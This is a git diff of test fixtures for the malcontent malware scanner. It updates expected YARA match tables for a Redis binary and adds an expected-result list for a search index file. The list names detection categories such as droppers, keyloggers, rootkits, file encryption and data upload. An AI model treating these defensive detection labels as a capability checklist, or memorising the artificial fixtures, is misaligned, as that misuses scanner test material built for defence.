[/proc/self/maps](https://github.com/search?q=%2Fproc%2Fself%2Fmaps&type=code)
[/proc/self/oom_score_adj](https://github.com/search?q=%2Fproc%2Fself%2Foom_score_adj&type=code)
[/proc/self/smaps](https://github.com/search?q=%2Fproc%2Fself%2Fsmaps&type=code)
[/proc/self/stat](https://github.com/search?q=%2Fproc%2Fself%2Fstat&type=code)
[/proc/sys/net/core/somaxconn](https://github.com/search?q=%2Fproc%2Fsys%2Fnet%2Fcore%2Fsomaxconn&type=code)
[/proc/sys/vm/overcommit_memory](https://github.com/search?q=%2Fproc%2Fsys%2Fvm%2Fovercommit_memory&type=code)
[/sys/devices/system/clocksource/clocksource0](https://github.com/search?q=%2Fsys%2Fdevices%2Fsystem%2Fclocksource%2Fclocksource0&type=code)
[/tmp/dump.bin](https://github.com/search?q=%2Ftmp%2Fdump.bin&type=code)
[/tmp/dump.hex](https://github.com/search?q=%2Ftmp%2Fdump.hex&type=code)
[/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code)
[sysctl.](https://github.com/search?q=sysctl.&type=code) | -| MEDIUM | [dylib/symbol/address](https://github.com/chainguard-dev/malcontent/blob/main/rules/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | -| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd.yara#exec) | executes a command | [execCommandAbort](https://github.com/search?q=execCommandAbort&type=code)
[replicaStartCommandStream](https://github.com/search?q=replicaStartCommandStream&type=code) | -| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program.yara#execve) | executes external programs | [execve](https://github.com/search?q=execve&type=code) | -| MEDIUM | [exec/shell_echo](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell_echo.yara#elf_calls_shell_echo) | [program generates text with echo command](https://linux.die.net/man/1/echo) | [echo 'maxmemory 128mb'](https://github.com/search?q=echo+%27maxmemory+128mb%27&type=code)
[echo madvise > /sys/kernel/mm/transparent_hugepage/enabled' as root](https://github.com/search?q=echo+madvise+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27+as+root&type=code)
[echo never > /sys/kernel/mm/transparent_hugepage/enabled'](https://github.com/search?q=echo+never+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27&type=code)
[echo tsc > /sys/devices/system/clocksource/clocksource0/current_clock](https://github.com/search?q=echo+tsc+%3E+%2Fsys%2Fdevices%2Fsystem%2Fclocksource%2Fclocksource0%2Fcurrent_clock&type=code) | -| MEDIUM | [fs/file/times/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-times-set.yara#shell_toucher) | change file timestamps | [touch the specified keys](https://github.com/search?q=touch+the+specified+keys&type=code) | -| MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | -| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http-post.yara#http_post) | submits content to websites | [POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | -| MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | -| MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntop](https://github.com/search?q=inet_ntop&type=code) | -| MEDIUM | [net/reuseport](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/reuseport.yara#reuseport) | reuse TCP/IP ports for listening and connecting | [SO_REUSEADDR](https://github.com/search?q=SO_REUSEADDR&type=code) | -| MEDIUM | [persist/pid_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file) | pid file, likely DIY daemon | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code)
[createPidFile](https://github.com/search?q=createPidFile&type=code) | -| MEDIUM | [process/name/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | -| MEDIUM | [process/username/get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) | -| MEDIUM | [procfs/arbitrary/pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/procfs/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%ld/smaps](https://github.com/search?q=%2Fproc%2F%25ld%2Fsmaps&type=code) | -| MEDIUM | [ref/daemon](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/daemon.yara#daemon) | Run as a background daemon | [daemonize](https://github.com/search?q=daemonize&type=code) | -| MEDIUM | [ref/ip_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/ip_port.yara#ip_and_port) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[bus_port](https://github.com/search?q=bus_port&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[master_port](https://github.com/search?q=master_port&type=code)
[prev_ip](https://github.com/search?q=prev_ip&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[updatePort](https://github.com/search?q=updatePort&type=code) | -| MEDIUM | [ref/path/relative](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/relative.yara#relative_path_val) | references and possibly executes relative path | [./redis-check-aof](https://github.com/search?q=.%2Fredis-check-aof&type=code)
[./redis-server](https://github.com/search?q=.%2Fredis-server&type=code) | -| MEDIUM | [ref/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/dump.bin](https://github.com/search?q=%2Ftmp%2Fdump.bin&type=code)
[/tmp/dump.hex](https://github.com/search?q=%2Ftmp%2Fdump.hex&type=code) | -| MEDIUM | [ref/words/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/exclamation.yara#exclamations) | gets very excited | [Check your memory ASAP !!!](https://github.com/search?q=Check+your+memory+ASAP+%21%21%21&type=code)
[Sentinel was not able to save the new configuration on disk!!!](https://github.com/search?q=Sentinel+was+not+able+to+save+the+new+configuration+on+disk%21%21%21&type=code) | -| MEDIUM | [ref/words/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/heartbeat.yara#heartbeat) | references a 'heartbeat' | [RM_SendChildHeartbeat](https://github.com/search?q=RM_SendChildHeartbeat&type=code)
[RedisModule_SendChildHeartbeat](https://github.com/search?q=RedisModule_SendChildHeartbeat&type=code) | -| LOW | [dylib/address/check](https://github.com/chainguard-dev/malcontent/blob/main/rules/dylib/address-check.yara#dladdr) | [determine if address belongs to a shared library](https://man7.org/linux/man-pages/man3/dladdr.3.html) | [dladdr](https://github.com/search?q=dladdr&type=code) | -| LOW | [env/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/env/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | -| LOW | [fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_create](https://github.com/search?q=epoll_create&type=code)
[epoll_wait](https://github.com/search?q=epoll_wait&type=code) | -| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | -| LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [rmdir](https://github.com/search?q=rmdir&type=code) | -| LOW | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-delete.yara#unlink) | [deletes files](https://man7.org/linux/man-pages/man2/unlink.2.html) | [unlink](https://github.com/search?q=unlink&type=code) | -| LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate64](https://github.com/search?q=ftruncate64&type=code) | -| LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-write.yara#file_write) | writes to file | [ewriteConfigOverwriteFile](https://github.com/search?q=ewriteConfigOverwriteFile&type=code) | -| LOW | [fs/lock/update](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/lock-update.yara#flock) | apply or remove an advisory lock on a file | [flock](https://github.com/search?q=flock&type=code) | -| LOW | [fs/tempfile/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [temp file](https://github.com/search?q=temp+file&type=code) | -| LOW | [kernel/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | -| LOW | 
[net/hostport/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | -| LOW | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-listen.yara#listen) | listen on a socket | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| LOW | [net/socket/local/address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-local-address.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | -| LOW | [net/socket/peer/address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | -| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-receive.yara#recv) | [receive a message to a socket](https://linux.die.net/man/2/recv) | [recv](https://github.com/search?q=recv&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-send.yara#send) | [send a message to a socket](https://linux.die.net/man/2/send) | [send](https://github.com/search?q=send&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | -| LOW | [random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) | -| LOW | [ref/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/etc.yara#etc_path) | path reference within /etc | [/etc/myredis.conf](https://github.com/search?q=%2Fetc%2Fmyredis.conf&type=code)
[/etc/rc.local](https://github.com/search?q=%2Fetc%2Frc.local&type=code)
[/etc/redis/](https://github.com/search?q=%2Fetc%2Fredis%2F&type=code)
[/etc/sentinel.conf](https://github.com/search?q=%2Fetc%2Fsentinel.conf&type=code)
[/etc/sysctl.conf](https://github.com/search?q=%2Fetc%2Fsysctl.conf&type=code) | -| LOW | [ref/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/var.yara#var_path) | path reference within /var | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code) | -| LOW | [ref/site/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/site/url.yara#https_url) | contains embedded HTTPS URLs | [https://redis.io/commands/slowlog](https://redis.io/commands/slowlog)
[https://redis.io/topics/latency-monitor.](https://redis.io/topics/latency-monitor.) | -| LOW | [ref/words/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/password.yara#password) | references a 'password' | [ACLCheckPasswordHash](https://github.com/search?q=ACLCheckPasswordHash&type=code)
[ACLHashPassword](https://github.com/search?q=ACLHashPassword&type=code)
[authentication password for the default](https://github.com/search?q=authentication+password+for+the+default&type=code)
[bit user password](https://github.com/search?q=bit+user+password&type=code)
[checkPasswordBasedAuth](https://github.com/search?q=checkPasswordBasedAuth&type=code)
[for the output password](https://github.com/search?q=for+the+output+password&type=code)
[passwords](https://github.com/search?q=passwords&type=code)
[the number of password](https://github.com/search?q=the+number+of+password&type=code)
[tlsPasswordCallback](https://github.com/search?q=tlsPasswordCallback&type=code)
[username and password](https://github.com/search?q=username+and+password&type=code)
[username-password pair or user is](https://github.com/search?q=username-password+pair+or+user+is&type=code) | +| RISK | KEY | DESCRIPTION | EVIDENCE | +|--------|------------------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| HIGH | [combo/degrader/linux_paths](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/degrader/linux_paths.yara#linux_critical_system_paths_small_elf) | ELF accesses multiple critical Linux paths | | +| MEDIUM | [dylib/symbol/address](https://github.com/chainguard-dev/malcontent/blob/main/rules/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | +| MEDIUM | 
[exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd.yara#exec) | executes a command | [execCommandAbort](https://github.com/search?q=execCommandAbort&type=code)
[replicaStartCommandStream](https://github.com/search?q=replicaStartCommandStream&type=code) | +| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program.yara#execve) | executes external programs | [execve](https://github.com/search?q=execve&type=code) | +| MEDIUM | [exec/shell_echo](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell_echo.yara#elf_calls_shell_echo) | [program generates text with echo command](https://linux.die.net/man/1/echo) | [echo 'maxmemory 128mb'](https://github.com/search?q=echo+%27maxmemory+128mb%27&type=code)
[echo madvise > /sys/kernel/mm/transparent_hugepage/enabled' as root](https://github.com/search?q=echo+madvise+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27+as+root&type=code)
[echo never > /sys/kernel/mm/transparent_hugepage/enabled'](https://github.com/search?q=echo+never+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27&type=code)
[echo tsc > /sys/devices/system/clocksource/clocksource0/current_clock](https://github.com/search?q=echo+tsc+%3E+%2Fsys%2Fdevices%2Fsystem%2Fclocksource%2Fclocksource0%2Fcurrent_clock&type=code) | +| MEDIUM | [fs/file/times/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-times-set.yara#shell_toucher) | change file timestamps | [touch the specified keys](https://github.com/search?q=touch+the+specified+keys&type=code) | +| MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | +| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http-post.yara#http_post) | submits content to websites | [POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | +| MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | +| MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntop](https://github.com/search?q=inet_ntop&type=code) | +| MEDIUM | [net/reuseport](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/reuseport.yara#reuseport) | reuse TCP/IP ports for listening and connecting | [SO_REUSEADDR](https://github.com/search?q=SO_REUSEADDR&type=code) | +| MEDIUM | [persist/pid_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file) | pid file, likely DIY daemon | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code)
[createPidFile](https://github.com/search?q=createPidFile&type=code) | +| MEDIUM | [process/name/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | +| MEDIUM | [process/username/get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) | +| MEDIUM | [procfs/arbitrary/pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/procfs/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%ld/smaps](https://github.com/search?q=%2Fproc%2F%25ld%2Fsmaps&type=code) | +| MEDIUM | [ref/daemon](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/daemon.yara#daemon) | Run as a background daemon | [daemonize](https://github.com/search?q=daemonize&type=code) | +| MEDIUM | [ref/ip_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/ip_port.yara#ip_and_port) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[bus_port](https://github.com/search?q=bus_port&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[master_port](https://github.com/search?q=master_port&type=code)
[prev_ip](https://github.com/search?q=prev_ip&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[updatePort](https://github.com/search?q=updatePort&type=code) | +| MEDIUM | [ref/path/relative](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/relative.yara#relative_path_val) | references and possibly executes relative path | [./redis-check-aof](https://github.com/search?q=.%2Fredis-check-aof&type=code)
[./redis-server](https://github.com/search?q=.%2Fredis-server&type=code) | +| MEDIUM | [ref/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/dump.bin](https://github.com/search?q=%2Ftmp%2Fdump.bin&type=code)
[/tmp/dump.hex](https://github.com/search?q=%2Ftmp%2Fdump.hex&type=code) | +| MEDIUM | [ref/words/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/exclamation.yara#exclamations) | gets very excited | [Check your memory ASAP !!!](https://github.com/search?q=Check+your+memory+ASAP+%21%21%21&type=code)
[Sentinel was not able to save the new configuration on disk!!!](https://github.com/search?q=Sentinel+was+not+able+to+save+the+new+configuration+on+disk%21%21%21&type=code) | +| MEDIUM | [ref/words/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/heartbeat.yara#heartbeat) | references a 'heartbeat' | [RM_SendChildHeartbeat](https://github.com/search?q=RM_SendChildHeartbeat&type=code)
[RedisModule_SendChildHeartbeat](https://github.com/search?q=RedisModule_SendChildHeartbeat&type=code) | +| LOW | [dylib/address/check](https://github.com/chainguard-dev/malcontent/blob/main/rules/dylib/address-check.yara#dladdr) | [determine if address belongs to a shared library](https://man7.org/linux/man-pages/man3/dladdr.3.html) | [dladdr](https://github.com/search?q=dladdr&type=code) | +| LOW | [env/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/env/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | +| LOW | [fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_create](https://github.com/search?q=epoll_create&type=code)
[epoll_wait](https://github.com/search?q=epoll_wait&type=code) | +| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | +| LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [rmdir](https://github.com/search?q=rmdir&type=code) | +| LOW | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-delete.yara#unlink) | [deletes files](https://man7.org/linux/man-pages/man2/unlink.2.html) | [unlink](https://github.com/search?q=unlink&type=code) | +| LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate64](https://github.com/search?q=ftruncate64&type=code) | +| LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-write.yara#file_write) | writes to file | [ewriteConfigOverwriteFile](https://github.com/search?q=ewriteConfigOverwriteFile&type=code) | +| LOW | [fs/lock/update](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/lock-update.yara#flock) | apply or remove an advisory lock on a file | [flock](https://github.com/search?q=flock&type=code) | +| LOW | [fs/tempfile/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [temp file](https://github.com/search?q=temp+file&type=code) | +| LOW | [kernel/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | +| LOW | 
[net/hostport/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | +| LOW | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-listen.yara#listen) | listen on a socket | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| LOW | [net/socket/local/address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-local-address.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | +| LOW | [net/socket/peer/address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | +| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-receive.yara#recv) | [receive a message to a socket](https://linux.die.net/man/2/recv) | [recv](https://github.com/search?q=recv&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-send.yara#send) | [send a message to a socket](https://linux.die.net/man/2/send) | [send](https://github.com/search?q=send&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | +| LOW | [random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) | +| LOW | [ref/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/etc.yara#etc_path) | path reference within /etc | [/etc/myredis.conf](https://github.com/search?q=%2Fetc%2Fmyredis.conf&type=code)
[/etc/rc.local](https://github.com/search?q=%2Fetc%2Frc.local&type=code)
[/etc/redis/](https://github.com/search?q=%2Fetc%2Fredis%2F&type=code)
[/etc/sentinel.conf](https://github.com/search?q=%2Fetc%2Fsentinel.conf&type=code)
[/etc/sysctl.conf](https://github.com/search?q=%2Fetc%2Fsysctl.conf&type=code) | +| LOW | [ref/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/var.yara#var_path) | path reference within /var | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code) | +| LOW | [ref/site/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/site/url.yara#https_url) | contains embedded HTTPS URLs | [https://redis.io/commands/slowlog](https://redis.io/commands/slowlog)
[https://redis.io/topics/latency-monitor.](https://redis.io/topics/latency-monitor.) | +| LOW | [ref/words/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/password.yara#password) | references a 'password' | [ACLCheckPasswordHash](https://github.com/search?q=ACLCheckPasswordHash&type=code)
[ACLHashPassword](https://github.com/search?q=ACLHashPassword&type=code)
[authentication password for the default](https://github.com/search?q=authentication+password+for+the+default&type=code)
[bit user password](https://github.com/search?q=bit+user+password&type=code)
[checkPasswordBasedAuth](https://github.com/search?q=checkPasswordBasedAuth&type=code)
[for the output password](https://github.com/search?q=for+the+output+password&type=code)
[passwords](https://github.com/search?q=passwords&type=code)
[the number of password](https://github.com/search?q=the+number+of+password&type=code)
[tlsPasswordCallback](https://github.com/search?q=tlsPasswordCallback&type=code)
[username and password](https://github.com/search?q=username+and+password&type=code)
[username-password pair or user is](https://github.com/search?q=username-password+pair+or+user+is&type=code) |
diff --git a/test_data/linux/clean/runtime-security-fentry.o.simple b/test_data/linux/clean/runtime-security-fentry.o.simple
index 1d8685b9..c442aa54 100644
--- a/test_data/linux/clean/runtime-security-fentry.o.simple
+++ b/test_data/linux/clean/runtime-security-fentry.o.simple
@@ -13,7 +13,6 @@ fs/permission/modify: medium
 fs/unmount: low
 kernel/acct: low
 kernel/module: medium
-kernel/module/load: medium
 kernel/ptrace: medium
 kernel/seccomp: low
 net/bpf: medium
diff --git a/test_data/linux/clean/runtime-security-syscall-wrapper.o.simple b/test_data/linux/clean/runtime-security-syscall-wrapper.o.simple
index 6f45f19e..b023731d 100644
--- a/test_data/linux/clean/runtime-security-syscall-wrapper.o.simple
+++ b/test_data/linux/clean/runtime-security-syscall-wrapper.o.simple
@@ -14,7 +14,6 @@ fs/permission/modify: medium
 fs/unmount: low
 kernel/acct: low
 kernel/module: medium
-kernel/module/load: medium
 kernel/ptrace: medium
 kernel/seccomp: low
 net/bpf: medium
diff --git a/test_data/linux/clean/runtime-security.o.simple b/test_data/linux/clean/runtime-security.o.simple
index 4faad3e6..e7111ba8 100644
--- a/test_data/linux/clean/runtime-security.o.simple
+++ b/test_data/linux/clean/runtime-security.o.simple
@@ -13,7 +13,6 @@ fs/permission/modify: medium
 fs/unmount: low
 kernel/acct: low
 kernel/module: medium
-kernel/module/load: medium
 kernel/ptrace: medium
 kernel/seccomp: low
 net/bpf: medium
diff --git a/test_data/linux/clean/searchindex.json.simple b/test_data/linux/clean/searchindex.json.simple
new file mode 100644
index 00000000..9bd40de2
--- /dev/null
+++ b/test_data/linux/clean/searchindex.json.simple
@@ -0,0 +1,62 @@
+# linux/clean/searchindex.json: high
+3P/threat_hunting/dd: medium
+3P/threat_hunting/keylogger: medium
+admin/package/install: medium
+admin/pip_install: medium
+admin/system_directories: medium
+combo/dropper/shell: medium
+combo/recon/docker: medium
+compression/bzip2: low
+crypto/file/encrypter: medium
+data/embedded/html: medium
+evasion/rootkit: medium
+exec/program: medium
+exec/shell_command: medium
+fs/directory/create: low
+fs/file/delete: low
+fs/file/delete/forcibly: medium
+fs/file/times/set: medium
+fs/mount: low
+fs/watch: low
+kernel/platform: low
+kernel/sysinfo: medium
+net/dns/servers: low
+net/dns/txt: low
+net/fetch: medium
+net/icmp: medium
+net/socket/listen: low
+net/socket/send: low
+net/ssh: medium
+net/upload: medium
+persist/crontab: medium
+process/chdir: low
+process/chdir/unusual: medium
+process/chroot: low
+process/executable_path: low
+random/insecure: low
+ref/daemon: medium
+ref/path/boot: medium
+ref/path/dev: medium
+ref/path/etc: low
+ref/path/etc/resolv.conf: low
+ref/path/tmp: medium
+ref/path/users: medium
+ref/path/usr/local: medium
+ref/path/var: low
